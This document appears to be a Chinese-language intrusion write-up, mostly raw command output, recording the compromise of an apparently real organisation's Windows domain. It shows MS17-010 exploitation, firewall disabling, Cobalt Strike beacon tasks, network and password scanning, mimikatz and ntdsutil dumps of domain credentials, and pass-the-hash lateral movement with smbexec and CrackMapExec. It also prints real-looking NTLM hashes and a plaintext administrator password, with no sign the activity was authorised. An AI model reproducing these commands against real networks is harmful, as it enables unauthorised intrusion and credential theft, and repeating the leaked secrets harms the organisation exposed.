Target SP is: 1
[+] Backdoor installed
[-] DLL Architecture is: 64 bit
Error sending wrong architecture DLL to target
[-] DLL NOT built
C:\Users\good\Desktop\nw\ms17-010>go.bat 10.10.10.41 x86
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x894EDE86
SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
Target OS is: 7 x86
Target SP is: 1
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
使用工具进行利用
C:\Windows\system32>netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state off
Ok.
成功进入目标机器,本打算使用 hta 继续弹一个 beacon 给 cs,但是尝试了几次不好使。
使用密码登录 3389,但是没有登录成功,3389 确实开启,这里关闭防火墙。
good14 beacon> shell arp -a
[*] Tasked beacon to run: arp -a
[+] host called home, sent: 37 bytes
[+] received output:
介面: 10.10.10.2 --- 0xc
网际网路网址 实体位址 类型
10.10.10.1 6c-2b-59-7f-1e-74 动态
10.10.10.3 6c-2b-59-7f-1b-3c 动态
10.10.10.4 00-0c-29-f7-4e-92 动态
10.10.10.5 10-98-36-b0-ed-ad 动态
10.10.10.6 18-03-73-2c-46-9d 动态
10.10.10.8 00-0c-29-57-cd-5d 动态
10.10.10.10 00-11-32-5c-f9-0a 动态
10.10.10.11 00-10-18-06-09-eb 动态
10.10.10.12 00-10-18-1a-8c-08 动态
10.10.10.13 00-10-18-04-03-3c 动态
10.10.10.14 00-10-18-1a-66-4e 动态
10.10.10.17 00-0c-29-3c-30-ea 动态
10.10.10.19 20-47-47-82-31-a0 动态
10.10.10.20 20-47-47-82-31-a2 动态
10.10.10.21 98-90-96-bc-4f-6c 动态
10.10.10.22 98-90-96-bc-f2-09 动态
10.10.10.23 98-90-96-bc-ed-92 动态
10.10.10.25 18-66-da-2c-e0-de 动态
10.10.10.26 54-bf-64-6f-68-46 动态
10.10.10.27 e4-54-e8-92-95-f1 动态
10.10.10.28 54-bf-64-6f-68-28 动态
10.10.10.29 54-bf-64-6f-6b-04 动态
10.10.10.30 88-d7-f6-ae-e4-01 动态
10.10.10.33 e4-54-e8-92-9b-e7 动态
10.10.10.35 74-d4-35-6f-bc-12 动态
10.10.10.38 98-90-96-b6-ec-95 动态
10.10.10.39 88-d7-f6-ae-e3-6b 动态
10.10.10.41 98-90-96-b6-e6-e3 动态
10.10.10.42 e4-54-e8-92-a5-68 动态
10.10.10.44 18-03-73-ca-e4-5f 动态
10.10.10.47 08-97-98-aa-b4-98 动态
10.10.10.48 54-bf-64-6f-68-26 动态
10.10.10.49 00-d0-17-70-c1-03 动态
10.10.10.50 00-d0-17-70-c0-cc 动态
10.10.10.51 42-08-5b-6a-25-29 动态
10.10.10.56 78-45-c4-b9-b4-c6 动态
10.10.10.61 18-66-da-2c-e5-7f 动态
10.10.10.62 18-66-da-2d-04-25 动态
10.10.10.63 18-66-da-2d-01-1c 动态
10.10.10.65 20-47-47-25-a7-66 动态
10.10.10.66 20-47-47-25-a7-58 动态
10.10.10.68 20-47-47-25-a8-98 动态
10.10.10.69 20-47-47-25-aa-37 动态
10.10.10.72 54-bf-64-01-52-a0 动态
10.10.10.75 d8-d0-90-1d-92-d8 动态
10.10.10.78 d8-d0-90-1d-96-1c 动态
10.10.10.80 d8-d0-90-1d-96-1b 动态
10.10.10.82 10-7d-1a-0d-d5-1b 动态
10.10.10.84 08-9e-01-f3-f8-be 动态
10.10.10.85 f0-d4-e2-f7-62-83 动态
10.10.10.89 08-00-37-f0-2d-71 动态
10.10.10.90 00-11-32-aa-ab-42 动态
10.10.10.91 54-bf-64-6f-6a-fe 动态
10.10.10.95 64-00-6a-0b-f4-5c 动态
10.10.10.100 00-0c-29-19-e7-fa 动态
10.10.10.102 54-bf-64-6a-be-41 动态
10.10.10.104 64-00-6a-0b-f0-11 动态
10.10.10.105 64-00-6a-0b-76-a2 动态
10.10.10.106 64-00-6a-0b-ed-89 动态
10.10.10.111 6c-2b-59-f4-49-3b 动态
10.10.10.114 54-bf-64-6a-be-12 动态
10.10.10.116 54-bf-64-6f-6a-0c 动态
10.10.10.117 ec-d6-8a-3f-ba-84 动态
10.10.10.118 ec-d6-8a-4a-b2-19 动态
10.10.10.121 54-bf-64-6a-c2-e7 动态
10.10.10.126 54-bf-64-6a-be-4e 动态
10.10.10.133 54-bf-64-6a-be-03 动态
10.10.10.134 54-bf-64-6f-6a-0a 动态
10.10.10.136 54-bf-64-6f-15-f7 动态
10.10.10.142 54-bf-64-6a-bd-f0 动态
10.10.10.143 54-bf-64-6a-c1-66 动态
10.10.10.144 54-bf-64-6a-c1-47 动态
10.10.10.145 54-bf-64-6f-14-e7 动态
10.10.10.146 54-bf-64-6f-6a-03 动态
10.10.10.152 54-bf-64-6f-6a-2a 动态
10.10.10.154 54-bf-64-6f-6a-0e 动态
10.10.10.155 54-bf-64-6a-be-04 动态
10.10.10.156 54-bf-64-6f-6a-29 动态
10.10.10.159 c0-8a-cd-5f-5b-47 动态
10.10.10.160 ec-d6-8a-3f-ba-36 动态
10.10.10.161 54-bf-64-6a-be-1f 动态
10.10.10.162 54-bf-64-6f-14-4d 动态
10.10.10.163 54-bf-64-6a-be-a5 动态
10.10.10.164 54-bf-64-6f-14-57 动态
10.10.10.165 54-bf-64-6a-be-40 动态
10.10.10.166 54-bf-64-6a-c2-e4 动态
10.10.10.175 54-bf-64-6f-69-f2 动态
10.10.10.176 54-bf-64-6a-be-5a 动态
10.10.10.179 54-bf-64-6a-be-16 动态
10.10.10.180 54-bf-64-6f-14-79 动态
10.10.10.182 54-bf-64-6a-bd-f2 动态
10.10.10.192 18-03-73-2c-48-dc 动态
10.10.10.195 54-bf-64-6f-16-96 动态
10.10.10.196 e4-54-e8-92-9b-ac 动态
10.10.10.231 24-31-84-28-4a-34 动态
10.10.10.232 80-38-96-91-96-7d 动态
10.10.10.250 28-84-fa-dc-d5-46 动态
10.10.10.253 00-1d-aa-17-b1-40 动态
10.10.10.254 00-50-7f-c7-d8-b0 动态
10.10.11.6 18-03-73-21-70-71 动态
10.10.11.13 84-8f-69-fa-49-74 动态
10.10.11.17 00-0c-29-98-ae-8f 动态
10.10.11.19 00-0c-29-a3-bf-27 动态
10.10.11.20 00-1d-aa-89-9e-80 动态
10.10.11.77 00-1d-aa-46-3d-60 动态
10.10.11.100 18-66-da-2d-02-0c 动态
10.10.11.102 48-4d-7e-d0-b6-18 动态
10.10.11.103 18-66-da-37-91-7e 动态
10.10.11.105 18-66-da-22-f1-db 动态
10.10.11.106 48-4d-7e-de-2d-0c 动态
10.10.11.107 50-9a-4c-3f-c5-82 动态
10.10.11.110 50-9a-4c-40-aa-6f 动态
10.10.11.111 54-bf-64-a3-d3-47 动态
10.10.11.112 18-66-da-22-a7-d9 动态
10.10.11.113 48-4d-7e-de-09-94 动态
10.10.11.114 48-4d-7e-dd-00-3e 动态
10.10.11.116 18-66-da-1f-64-db 动态
10.10.11.117 48-4d-7e-f1-6c-8c 动态
10.10.11.118 48-4d-7e-f1-30-ee 动态
10.10.11.120 48-4d-7e-f1-2d-9e 动态
10.10.11.121 18-66-da-22-f5-13 动态
10.10.11.122 18-66-da-22-f3-1f 动态
10.10.11.124 18-66-da-22-f4-7b 动态
10.10.11.125 64-00-6a-76-3b-ce 动态
10.10.11.127 48-4d-7e-e4-b7-1c 动态
10.10.11.129 48-4d-7e-d1-ab-78 动态
10.10.11.130 48-4d-7e-dd-32-d4 动态
10.10.11.131 48-4d-7e-d1-5b-1e 动态
10.10.11.133 18-66-da-22-f2-35 动态
10.10.11.134 54-bf-64-a3-e0-63 动态
10.10.11.135 64-00-6a-8d-47-cb 动态
10.10.11.137 48-4d-7e-e3-e7-4b 动态
10.10.11.138 18-66-da-22-f4-5d 动态
10.10.11.140 48-4d-7e-df-84-bb 动态
10.10.11.141 50-9a-4c-3f-ff-bd 动态
10.10.11.142 18-66-da-22-ab-16 动态
10.10.11.143 48-4d-7e-df-96-99 动态
10.10.11.144 48-4d-7e-f2-4d-2d 动态
10.10.11.147 48-4d-7e-cf-88-f4 动态
10.10.11.148 64-00-6a-91-8b-ff 动态
10.10.11.248 64-00-6a-5d-9d-c7 动态
10.10.11.249 64-00-6a-74-a8-20 动态
10.10.11.254 00-50-7f-e0-78-18 动态
10.10.11.255 ff-ff-ff-ff-ff-ff 静态
169.254.92.3 54-bf-64-20-66-1d 动态
169.254.222.47 18-66-da-2c-e0-f1 动态
224.0.0.2 01-00-5e-00-00-02 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.251 01-00-5e-00-00-fb 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.254.1.2 01-00-5e-7e-01-02 静态
239.255.102.18 01-00-5e-7f-66-12 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
成功连接,连接上去之后,发现有杀毒,信任 beacon 或者添加 c 盘信任。
同样的方式拿下 3,2,4,41。
beacon> shell C:\Windows\TAPI\f.exe -h 10.10.11.1/24 -pwdf C:\Windows\TAPI\pass.txt -user Administrator -domain WEGO -o C:\Windows\TAPI\1.txt
[+] received output:
10.10.11.99 (Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]10.10.11.8
[->]Win7x64Pro
[->]10.10.11.8
NetInfo:
[*]10.10.11.99
[->]backuwego
[->]10.10.11.99
[->]10.30.10.199
NetInfo:
[*]10.10.11.6
[->]stufiles
[->]10.10.11.6
10.10.11.8 (Windows 7 Professional 7601 Service Pack 1)
WebTitle:http://10.10.11.6:80 403 IIS 8.0 閰喟敦�航炊 - 403.14 - Forbidden
NetInfo:
[*]10.10.11.7
[->]digireadweb
[->]10.10.11.7
10.10.11.7 (Windows Server (R) 2008 Standard 6003 Service Pack 2)
WebTitle:http://10.10.11.95:443 400 400 Bad Request
WebTitle:http://10.10.11.95:80 200 None
SMB:10.10.11.6:445:WEGO\Administrator jo6ek6vul3vm,6
WebTitle:http://10.10.11.14:80 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.15:80 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.14:443 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.15:443 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.16:443 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.16:80 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.10:80 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.10:443 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.7:80 200 �����梯��訾�撠���-嚚��梯��扳��霈�嚚�
WebTitle:https://10.10.11.95:443 200 None
[+] received output:
WebTitle:https://10.10.11.77:443 200 Vigor 登入页面
WebTitle:http://10.10.11.77:80 200 Vigor 登入页面
WebTitle:https://10.10.11.254:443 200 Vigor Login Page
WebTitle:https://10.10.11.20:443 200 Vigor 登入页面
WebTitle:http://10.10.11.254:80 200 Vigor Login Page
WebTitle:https://10.10.11.80:443 200 CN8000A - Cover
[+] received output:
scan end
beacon> shell C:\Windows\TAPI\f.exe -h 10.10.11.1/24 -pwdf C:\Windows\TAPI\pass.txt -user Administrator -domain WEGO -o C:\Windows\TAPI\1.txt -p 445 -m smb
icmp alive hosts len is: 21
10.10.11.7:445 open
10.10.11.8:445 open
10.10.11.6:445 open
10.10.11.99:445 open
SMB:10.10.11.6:445:WEGO\Administrator jo6ek6vul3vm,6
使用 fcan 扫描一下具体信息
beacon> shell c:\Windows\TAPI\mimikatz.exe ""privilege::debug"" ""lsadump::lsa /patch full"" exit >>c:\Windows\TAPI\log1.txt
扫描 smb 服务看一下
ID : 00000e07 (3591)
User : ws4311
LM : 54191cf4166bc549aad3b435b51404ee
NTLM : 4790310f070043b5d1709a30aede1a27
RID : 00000e08 (3592)
User : ws4312
LM : 03b93594f7afee8caad3b435b51404ee
NTLM : 5dab331d3681f85c85503c9437cfc03b
RID : 00000e09 (3593)
User : ws4313
LM : d4cb20e652df2393aad3b435b51404ee
NTLM : b6a56cab9d2568151015094e90cbd21d
RID : 00000e0a (3594)
User : ws4314
LM : 687ac937560351a6aad3b435b51404ee
NTLM : d7a7fca890e9f3c1d435bd5fc0caf327
RID : 00000e0b (3595)
User : ws4315
LM : 0a19188cf464dda2aad3b435b51404ee
NTLM : 6f748524eda9a94cb30dd323695b092e
RID : 00000e0c (3596)
User : ws4316
LM : 7784d6e4bdf4f440aad3b435b51404ee
NTLM : 3cb0a4c08952437b6311db01eedd3c45
机器很多,尝试哈希传递攻击。
登录域控制器 10.2 的 3389 使用迷你卡姿,抓去所有域内的 hash。
C:\Windows\system32>ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil: snapshot
快照: activate instance ntds
使用中执行个体已设定为 "ntds"。
快照: create
正在建立快照...
快照集 {1dc812ae-3ae6-475b-bb67-ccafe028ae69} 已经成功产生。
快照: quit
ntdsutil: quit
C:\Windows\system32>ntdsutil snapshot "mount {1dc812ae-3ae6-475b-bb67-ccafe028ae
69}" quit quit
ntdsutil: snapshot
快照: mount {1dc812ae-3ae6-475b-bb67-ccafe028ae69}
快照 {3f3a24b3-ce4f-4096-852a-0b3864a8909d} 已挂接为 C:\$SNAP_202012062103_VOLUM
EC$\
快照: quit
ntdsutil: quit
C:\Windows\system32>copy C:\$SNAP_202012062103_VOLUMEC$\Windows\NTDS\ntds.dit c:
\ntds.dit
复制了 1 个档案。
C:\Windows\system32>
最后删除快照
C:\Windows\system32>ntdsutil snapshot "unmount {1dc812ae-3ae6-475b-bb67-ccafe028
ae69}" quit quit
ntdsutil: snapshot
快照: unmount {1dc812ae-3ae6-475b-bb67-ccafe028ae69}
快照 {3f3a24b3-ce4f-4096-852a-0b3864a8909d} 已卸載。
快照: quit
ntdsutil: quit
C:\Windows\system32>ntdsutil snapshot "delete {1dc812ae-3ae6-475b-bb67-ccafe028
ae69}" quit quit
ntdsutil: snapshot
快照: delete {1dc812ae-3ae6-475b-bb67-ccafe028ae69}
快照 {3f3a24b3-ce4f-4096-852a-0b3864a8909d} 已經刪除。
快照: quit
ntdsutil: quit
C:\Windows\system32>
或者使用 cs 插件
C:\Windows\system32>reg save hklm\sam sam.hiv
密码很多,这里就截取一部分。
SAM 数据库中保存信息进行提取, 全面获取系统中的密码信息,还要对 SAM 数据库中保存的信息进行提取,导出当前系统中所有本地用户的 hash。
C:\Windows\system32>reg save hklm\sam sam.hiv
导出 sam 和 system:
➜ Public python3 1.py -ntds ntds.dit -system system.hiv LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xaf91815108821533b8b5c1365be697c1
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: e28acd8770d422291bab9e2a9f8901d4
[*] Reading and decrypting hashes from ntds.dit
AD2$:15142:aad3b435b51404eeaad3b435b51404ee:ef72a0d5642a9234a14daf517e4a9ccc:::
AD3-OLD$:16625:aad3b435b51404eeaad3b435b51404ee:ef5035822b6ada38890c81bced3e7427:::
AD1$:16630:aad3b435b51404eeaad3b435b51404ee:216f5e93e84c580d8c7d54995b82f35d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TsInternetUser:1000:22c206eac925d8cb606c5c8235eade10:65b4ce0675d0bb69277b75712e409528:::
IUSR_MAIL:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IWAM_MAIL:1005:a7aa223e7443a354630461ad9692aa95:0792a2872e4c3fe838d2d35a985e4e6f:::
Administrator:500:e74b5db312ea77404726d0d0bb05c458:a9398c8a95dbe6801f280d2cfb9c76de:::
操作顺利完成。
smbexec.py -hashes :<hash> 域/域用户名@192.168.10.2
本地使用 secretsdump.py,导出 hash
➜ Downloads python3 smbexec.py [email protected] -hashes :a9398c8a95dbe6801f280d2cfb9c76de
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
➜ NW python3 smbexec.py [email protected] -hashes :a9398c8a95dbe6801f280d2cfb9c76de
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
➜ NW python3 smbexec.py [email protected] -hashes :a9398c8a95dbe6801f280d2cfb9c76de
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\WINDOWS\system32>
哈希传递攻击与基于 IPC 的横向移动
PTH 仍然是基于 IPC 远程连接实现的。
smbexec 可以通过文件共享(admin$,c$,ipc$,d$)在远程系统中执行命令。
目标系统必须开放 445 端口并且 C$ 共享。
SMB 10.10.10.5 445 DATABASE [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.88 445 NONE [*] FXNICOS 0.1 (name:) (domain:) (signing:False) (SMBv1:True)
SMB 10.10.10.100 445 CARD100 [*] Windows 7 Professional 7601 Service Pack 1 (name:CARD100) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:True)
SMB 10.10.10.2 445 AD1 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.20 445 FILES2 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.101 445 PERSONNEL-3060 [*] Windows 10.0 Build 17134 x64 (name:PERSONNEL-3060) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:False)
SMB 10.10.10.19 445 FILES2 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.22 445 ACADEMIC [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.103 445 LIB-3020-83 [*] Windows 7 Professional 7601 Service Pack 1 (name:LIB-3020-83) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:True)
SMB 10.10.10.3 445 AD2 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.4 445 AD3 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.39 445 ASUS-500G4-PC [-] xx.xx.x x.xx\administrator:a9398c8a95dbe6801f280d2cfb9c76de STATUS_NETLOGON_NOT_STARTED
需要根据上面我们在域控制器中抓取的密码,找到对应 ip 的对应主机名和哈希,才能使用 smbexe,这里找到 AD3 的对应关系。
STPC-37$:7840:aad3b435b51404eeaad3b435b51404ee:24eaa29232d5eab4d560f748bc4649b4:::
STPC-33$:7847:aad3b435b51404eeaad3b435b51404ee:6ca428fed76b726f1656f3606cb0b2c9:::
STPC-16$:7819:aad3b435b51404eeaad3b435b51404ee:ca8ff27d7b093aff95922a0b88e77f5c:::
接着尝试 3389 等,中马,反弹 cs 就行。
使用 CrackMapExec 实现 Hash 传递:
SMB 10.10.10.5 445 DATABASE [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.88 445 NONE [*] FXNICOS 0.1 (name:) (domain:) (signing:False) (SMBv1:True)
SMB 10.10.10.100 445 CARD100 [*] Windows 7 Professional 7601 Service Pack 1 (name:CARD100) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:True)
SMB 10.10.10.2 445 AD1 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.20 445 FILES2 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.101 445 PERSONNEL-3060 [*] Windows 10.0 Build 17134 x64 (name:PERSONNEL-3060) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:False)
SMB 10.10.10.19 445 FILES2 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.22 445 ACADEMIC [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.103 445 LIB-3020-83 [*] Windows 7 Professional 7601 Service Pack 1 (name:LIB-3020-83) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:True)
SMB 10.10.10.3 445 AD2 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.4 445 AD3 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.39 445 ASUS-500G4-PC [-] xx.xx.x x.xx\administrator:a9398c8a95dbe6801f280d2cfb9c76de STATUS_NETLOGON_NOT_STARTED
这里注意该工具可以看到主机 ip 与用户名的对应关系,结合之前拿到的 hash 文件: 1.txt.ntds,把用户名、主机 ip、用户 hash 就结合起来了。这里截取一部分 `。
STPC-37$:7840:aad3b435b51404eeaad3b435b51404ee:24eaa29232d5eab4d560f748bc4649b4:::
STPC-33$:7847:aad3b435b51404eeaad3b435b51404ee:6ca428fed76b726f1656f3606cb0b2c9:::
STPC-16$:7819:aad3b435b51404eeaad3b435b51404ee:ca8ff27d7b093aff95922a0b88e77f5c:::
然后使用 smbexec.py 一个一个尝试。
网断还有个 11 段,太菜了,等学习了一下在打。
简单看了一下,有 web 服务、ftp 等。
这里推荐一个师傅写的内网扫描器:
https://github.com/shadow1ng/fscan
推荐文章 ++++